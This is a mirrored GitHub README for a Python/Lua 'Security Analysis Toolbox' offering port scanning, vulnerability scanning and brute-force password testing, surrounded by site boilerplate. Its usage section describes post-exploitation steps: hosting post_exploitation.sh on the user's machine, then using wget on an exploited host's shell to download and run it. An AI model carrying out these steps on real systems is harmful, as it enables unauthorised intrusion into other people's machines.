Giter Club home page Giter Club logo

cyber-evangelists / sec-project Goto Github PK

View Code? Open in Web Editor NEW
0.0 0.0 0.0 79 KB

This toolbox is designed to provide comprehensive tools for network and vulnerability analysis, as well as password security assessment. It aims to help security professionals and IT administrators to efficiently manage and assess security across their networks.

Python 53.52% Lua 46.48%
automation automation-framework automation-framework-development automation-testing security security-automation-framework security-research toolbox vulnerbility-analysis

sec-project's Introduction

Security Analysis Toolbox

Overview

This toolbox is designed to provide comprehensive tools for network and vulnerability analysis, as well as password security assessment. It aims to help security professionals and IT administrators to efficiently manage and assess security across their networks.

Features

Network Analysis

  • Network Discovery: Discover all devices connected to the network.
  • Port Scanning: Analyze open ports to identify potential vulnerabilities.
  • Device Detection: Detect all devices connected to the network and their status.

Vulnerability Analysis

  • Vulnerability Scanner: Scan systems for known vulnerabilities to mitigate potential threats.
  • Advanced Scanning: Conduct in-depth scans to uncover and assess deeper system vulnerabilities.

Password Security Analysis

  • Brute Force Attack Resistance Test: Test the strength of passwords against common brute-force methods.

Installation

To set up the Security Analysis Toolbox, clone this repository and install the required dependencies:

How to RUN the Project

RUN main.py on command line with a command as shown below:

To deploy this project run

  python main.py IP-Address --start-port 1 --end-port 40 

After the shell is opened follow these instructions

  • Open a command terminal on your PC where the post_explotation.sh file is located and run 'pyhton -m http.server' to host the file
  • Now on the shell run 'wget http://Your-IP-Address:8000/post_exploitation.sh', it will transfer the file in the exploited system
  • Confirm that the file has been transferred using 'ls; command
  • Now run chmod +x post_exploitation
  • Now run ./post_exploitation

and it will output the python vulnerabilities scripts.

Follow the on-screen menus to select the type of analysis you wish to perform.

Contributing

Contributions to this project are welcome. Please fork the repository and submit a pull request.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Contact

For support or any questions, email us at [email protected].

This README provides a concise yet comprehensive guide to your toolbox, outlining its features, installation instructions, usage guide, and ways to contribute. Adjust the content according to your actual setup and repository details.

sec-project's People

Contributors

anas-ce avatar husnain-ce avatar

sec-project's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.